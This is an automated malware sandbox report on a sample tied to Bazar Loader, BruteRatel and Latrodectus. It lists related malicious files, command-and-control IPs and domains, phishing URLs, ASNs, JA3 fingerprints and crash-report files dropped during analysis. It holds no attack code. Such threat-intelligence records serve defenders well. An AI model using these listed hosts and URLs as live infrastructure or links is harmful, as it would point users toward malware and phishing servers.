                                                                                                                                                                                                                      • 193.124.185.117
                                                                                                                                                                                                                      isomicrotich.comDocument-18-33-08.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      Document-19-51-48.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      vierm_soft_x64.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                      dsa.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      Document-19-27-03.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                      0.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      DLPAgent.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                      Document-21-41-00.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      x64_stealth.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      7ii6VB6bo3.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      greshunka.comDocument-18-33-08.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 82.115.223.39
                                                                                                                                                                                                                      Document-19-51-48.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 82.115.223.39
                                                                                                                                                                                                                      vierm_soft_x64.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 82.115.223.39
                                                                                                                                                                                                                      dsa.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 82.115.223.39
                                                                                                                                                                                                                      Document-19-27-03.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 82.115.223.39
                                                                                                                                                                                                                      0.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 82.115.223.39
                                                                                                                                                                                                                      DLPAgent.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 82.115.223.39
                                                                                                                                                                                                                      Document-21-41-00.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 92.118.112.130
                                                                                                                                                                                                                      CITROEN.msiGet hashmaliciousBazar Loader, BruteRatelBrowse
                                                                                                                                                                                                                      • 92.118.112.130
                                                                                                                                                                                                                      x64_stealth.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 92.118.112.130

                                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      MIDNET-ASTK-TelecomRUDocument-18-33-08.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 82.115.223.39
                                                                                                                                                                                                                      Document-19-51-48.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 82.115.223.39
                                                                                                                                                                                                                      vierm_soft_x64.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 82.115.223.39
                                                                                                                                                                                                                      dsa.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 82.115.223.39
                                                                                                                                                                                                                      Document-19-27-03.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 82.115.223.39
                                                                                                                                                                                                                      0.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 82.115.223.39
                                                                                                                                                                                                                      DLPAgent.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 82.115.223.39
                                                                                                                                                                                                                      failure.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 82.115.223.234
                                                                                                                                                                                                                      web3Interface.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 82.115.223.234
                                                                                                                                                                                                                      71uf5c9puG.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 82.115.223.228
                                                                                                                                                                                                                      CYBERDYNELRDocument-18-33-08.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 80.78.24.30
                                                                                                                                                                                                                      ponos.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                                                      • 80.78.28.83
                                                                                                                                                                                                                      SecuriteInfo.com.Heuristic.HEUR.AGEN.1313656.13208.30309.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                                                      • 80.78.28.83
                                                                                                                                                                                                                      firmware.i686.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 46.246.44.223
                                                                                                                                                                                                                      SecuriteInfo.com.Malicious_Behavior.SB.8937.18140.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 80.78.24.250
                                                                                                                                                                                                                      67gneXXY2P.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 46.246.43.211
                                                                                                                                                                                                                      attach#6081-18-03-2024.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 198.167.201.153
                                                                                                                                                                                                                      bin.elfGet hashmaliciousPwnRig MinerBrowse
                                                                                                                                                                                                                      • 80.78.24.30
                                                                                                                                                                                                                      http://5d1d57a7.28cb0c8c5155aeac03abaf42.workers.dev/?qrc=cHN0b2VsdGluZ0Btb29nLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                      • 80.78.24.136
                                                                                                                                                                                                                      https://url7923.marsello.io/ls/click?upn=Xn88PJeNIL29Y2OVpP6Ui-2FiJiLFhXN-2BaAoUhaFeS5thEexIiWqEF8dt08iW6JSqntxNZ_ZhPcx6WPs4ZPfYHsVw3kGc95DdiOlu2Hqu3wtZDfTdxDhqDrDyhN4LIHSWlo-2Bo5W6aEC693CmZYOUsRsAHZjNYMetybYb1uYwCQGuNUgutLCzNtMSdcaod8HflZ3qtLEYfvJ3h120nclv-2FPwWe4ZMuwG1g5FU0h57N477RbEMQV2-2FUVsni6xHvVTRhTmHDzgfD-2F3g-2BckOgde-2F51-2FeyDF08iaXxzVHgagCQPKWzGeSlI6hU-2B61MmZjONA8snu2jD66uyBw5PSnYyn0fMKgCqj-2FNBTJqL-2FTN8YlBx1uy4KooCKJiqFqcR8WxhpSnrzCOJaGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                      • 80.78.25.211
                                                                                                                                                                                                                      CLOUDFLARENETUSDocument-18-33-08.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      tMREqVW0.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                      • 104.20.3.235
                                                                                                                                                                                                                      https://auth-owlting.com/enterprise/core.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 172.67.204.46
                                                                                                                                                                                                                      https://wvr4dgzxxavl6jjpq7rl.igortsaplin.pro/WFzFCiNxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                      • 104.18.95.41
                                                                                                                                                                                                                      https://www.calameo.com/read/0077804248b46bb5a7c19Get hashmaliciousHtmlDropperBrowse
                                                                                                                                                                                                                      • 172.67.204.105
                                                                                                                                                                                                                      http://usaf.gov.ssGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.26.6.103
                                                                                                                                                                                                                      wSVyC8FY.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                      • 172.67.19.24
                                                                                                                                                                                                                      https://secured.viewonlineportalshared.com/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                                                      • 104.18.95.41
                                                                                                                                                                                                                      RfeGlbGe3t.exeGet hashmaliciousAveMaria, UACMeBrowse
                                                                                                                                                                                                                      • 1.2.3.4
                                                                                                                                                                                                                      https://dsfghfdaregfdgshfgdfh.blob.core.windows.net/dsfghfdaregfdgshfgdfh/l1.html#9/372-16527/1270-243896-29108Get hashmaliciousPhisherBrowse
                                                                                                                                                                                                                      • 104.21.32.108

                                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1Document-18-33-08.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      c84f2f8df965727bcdcc4de6beecf70c960ef7c885e77.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      0a839761915d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      sqlite.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      Activator by URKE v2.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      hVLguQ1OyJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 188.114.96.3

                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_vie_9d18ffd745e85a2e45f96e262f427525b6e8c80_521fc9a8_c4adbf37-59c1-4825-8620-812c334e58b1\Report.wer

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                      Entropy (8bit):0.7610145849760318
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:MVGIiayGVn0+BbCjjVBuzuiFNZ24lO8W:NIiHGV0+Bbsj6zuiFNY4lO8W
                                                                                                                                                                                                                      MD5:9E2254A0413830FD41C7CC35B1CA6B87
                                                                                                                                                                                                                      SHA1:A207FCDECC49809DE361145CE2775B7BD52DB971
                                                                                                                                                                                                                      SHA-256:343BE3CD7541C6272E4DE9CF9EF5DE30FDB8CAC74FC23FAC8065AB763975E2B9
                                                                                                                                                                                                                      SHA-512:696C70575B6EA24BC56ABCFB6C7597801070612C6ABB597ACEE5FBDB8FDBDF9AAE8B545254565091D4C660852A651EC29B1058ACC15F2FE0C9B872A9D2E458B8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.4.5.4.6.9.7.3.9.8.7.3.3.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.4.5.4.6.9.7.6.3.3.1.1.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.4.a.d.b.f.3.7.-.5.9.c.1.-.4.8.2.5.-.8.6.2.0.-.8.1.2.c.3.3.4.e.5.8.b.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.0.8.d.8.4.c.2.-.2.0.c.b.-.4.b.4.b.-.b.a.f.5.-.8.b.e.5.9.a.c.1.c.2.6.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.v.i.e.r.m._.s.o.f.t._.x.6.4...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.d.0.-.0.0.0.1.-.0.0.1.4.-.e.6.a.1.-.0.5.5.8.c.4.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.

                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_vie_b59ea1c308c3a03fedfbb82d3ba77dcda0f14f_521fc9a8_6634b2f7-63a0-4e64-b355-544c896eff14\Report.wer

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                      Entropy (8bit):0.7707941624353578
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:FCFa3o/VlwihyKynsjz4Rvoq7Rc6tQXIDcQ9c61cEccw3D9XaXz+HbHgSQgJj9Z2:ssYAihync0Dx23NjVBuzuiFNZ24lO8B
                                                                                                                                                                                                                      MD5:737E598D48A2E5DC5CEF3324B83DB17F
                                                                                                                                                                                                                      SHA1:436915A0E54B3DA5E477B6944E6015C193EEC1C0
                                                                                                                                                                                                                      SHA-256:62B8E8443938D8A5A3F591224F7A230A384E16DC15EE2548CD4C4050EF52CA83
                                                                                                                                                                                                                      SHA-512:8AC6B9598C0448751C042DF0702069B1CE08E38DC09D7DF0136980F96920375435C2799B0F5204A213754FA69E814E2ED6F765292D00E2FDD2DC5F284F1DB4A1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.4.5.4.7.0.4.3.1.3.9.4.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.4.5.4.7.0.4.9.7.0.1.9.3.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.6.3.4.b.2.f.7.-.6.3.a.0.-.4.e.6.4.-.b.3.5.5.-.5.4.4.c.8.9.6.e.f.f.1.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.3.f.0.a.9.a.7.-.9.c.1.c.-.4.1.a.f.-.b.8.7.d.-.d.f.f.d.f.f.4.7.5.3.3.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.v.i.e.r.m._.s.o.f.t._.x.6.4...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.a.c.-.0.0.0.1.-.0.0.1.4.-.2.a.0.1.-.9.e.5.b.c.4.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.

                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_vie_b59ea1c308c3a03fedfbb82d3ba77dcda0f14f_521fc9a8_fdc61285-e436-4443-932d-ddd2ea739cae\Report.wer

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                      Entropy (8bit):0.7677763314127422
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:yCFnnwi4yKygsjz4Rvoq7Rc6tQXIDcQ9c61cEccw3D9XaXz+HbHgSQgJj9Zh88Wv:Rui4ygc0Dx23NjVBuzuiFNZ24lO8B
                                                                                                                                                                                                                      MD5:35BE126270E3F69DE03ECCE5A3EAF185
                                                                                                                                                                                                                      SHA1:474E899498292B6F65ACFECCD9FE352278D9A8E6
                                                                                                                                                                                                                      SHA-256:BC7DE070C0DE0C955D278041AA2ACA454155E282E4ADAE77C2472C3750640563
                                                                                                                                                                                                                      SHA-512:EABE9CE5E4DCCFA3D9AF3F11BCC42C608B8399D157F46D281FD6DFEF4E892CA7AF04D154406A024441575B1149EEFD47DCBFBF7FE3609A7F05055091AB5B3AFD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.4.5.4.6.9.4.5.5.4.2.7.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.4.5.4.6.9.4.9.9.1.7.6.0.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.c.6.1.2.8.5.-.e.4.3.6.-.4.4.4.3.-.9.3.2.d.-.d.d.d.2.e.a.7.3.9.c.a.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.9.9.c.f.3.b.5.-.e.2.d.3.-.4.c.3.8.-.b.8.b.8.-.1.7.6.f.f.f.d.1.b.2.6.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.v.i.e.r.m._.s.o.f.t._.x.6.4...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.e.c.-.0.0.0.1.-.0.0.1.4.-.e.e.8.0.-.3.b.5.6.c.4.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.

                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_vie_b59ea1c308c3a03fedfbb82d3ba77dcda0f14f_521fc9a8_fdf005b5-1a28-4dce-bf44-fb0190b4fbfb\Report.wer

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                      Entropy (8bit):0.7676803576014632
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:I/FmwiRyKy8asjz4Rvoq7Rc6tQXIDcQ9c61cEccw3D9XaXz+HbHgSQgJj9Zh88Wv:WPiRyzc0Dx23NjVBuzuiFNZ24lO8B
                                                                                                                                                                                                                      MD5:4106B9E3AB6EB2205D2BD84BBF22AC64
                                                                                                                                                                                                                      SHA1:745CFD5A21B8E2A6A91604ADA42CCD5A91250164
                                                                                                                                                                                                                      SHA-256:05D0BFCE25FBACA906D082331DB10DFF6CB081A5142BBE0B5ACEF9B166507F0E
                                                                                                                                                                                                                      SHA-512:546D58D53607DD289C54D1F8011AFE16B577C2F416A5620555AD0544A6232DA6989C8C0D911516D7C26F38514A987F529097157574310851DB7BC527776ED58D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.4.5.4.6.9.4.5.6.2.2.1.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.4.5.4.6.9.5.1.8.7.2.1.3.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.f.0.0.5.b.5.-.1.a.2.8.-.4.d.c.e.-.b.f.4.4.-.f.b.0.1.9.0.b.4.f.b.f.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.1.e.3.d.0.3.4.-.0.9.c.c.-.4.1.b.0.-.8.f.4.3.-.c.1.3.c.4.a.2.4.9.3.d.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.v.i.e.r.m._.s.o.f.t._.x.6.4...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.4.0.-.0.0.0.1.-.0.0.1.4.-.d.d.9.7.-.3.9.5.6.c.4.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.

                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_vie_c6a6fbb15ed5c8cc571154b49674bd13dbd31f5_521fc9a8_71f73fd6-6b3e-4607-9047-6ca8f3853fae\Report.wer

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                      Entropy (8bit):0.7610494720878345
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:zFo8FmKwisyKyVsjz4RvI7qPfgQXIDcQAc6FcEfcw3iXaXz+HbHgSQgJj9Zh88We:za84isyVVv0+BV0jVBuzuiFNZ24lO8W
                                                                                                                                                                                                                      MD5:9002146B1AA3BA92086308D09BEE8F2C
                                                                                                                                                                                                                      SHA1:C7993B48D4859F13AC470B1B7D66956222DA493A
                                                                                                                                                                                                                      SHA-256:52D0B5B8FEA9538F17B7A70358918EEC6F50E2AFEA153A59CBE81C53BD56CF1A
                                                                                                                                                                                                                      SHA-512:2F6F5172DFA5188D648D949FB8FD2C8A5D522E632F2E5D71F9FEEFC262DAD0DC0E1A6E03F45873BB6AA174BA01474862CF8929F6547AA60C4A2E0D1BB150BBFE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.4.5.4.7.0.4.3.9.5.5.7.4.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.4.5.4.7.0.5.0.2.0.5.7.9.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.1.f.7.3.f.d.6.-.6.b.3.e.-.4.6.0.7.-.9.0.4.7.-.6.c.a.8.f.3.8.5.3.f.a.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.4.b.8.a.c.a.-.5.2.5.7.-.4.4.3.a.-.a.8.a.4.-.c.d.5.5.d.7.e.6.2.4.e.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.v.i.e.r.m._.s.o.f.t._.x.6.4...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.c.4.-.0.0.0.1.-.0.0.1.4.-.a.c.6.3.-.a.0.5.b.c.4.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.

                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_vie_c6a6fbb15ed5c8cc571154b49674bd13dbd31f5_521fc9a8_b6104caa-1983-4b71-878f-bd35263514ce\Report.wer

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                      Entropy (8bit):0.7611787015063111
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:lMFRQibwityKyDsjz4RvI7qPfgQXIDcQAc6FcEfcw3iXaXz+HbHgSQgJj9Zh88We:CMDityDVv0+BV0jVBuzuiFNZ24lO8W
                                                                                                                                                                                                                      MD5:1086BCDCBEF460EA2A4D8A959F1096C4
                                                                                                                                                                                                                      SHA1:56D5EB4D35F8305BB45AE7A9860DD44759C49C29
                                                                                                                                                                                                                      SHA-256:E28DE1C390647B30A2507BB8872C50072768B55E55CBF1CCEE0CF1B035DDB0A6
                                                                                                                                                                                                                      SHA-512:77AD2FE5603052850D7802D9A6F0A295DD68ED47105413AF52BA5A516CCE1ED1733A2488C091E819F66380E223E688F693272109957737EA260C130D3C5D23A7
                                                                                                                                                                                                                      Malicious:false
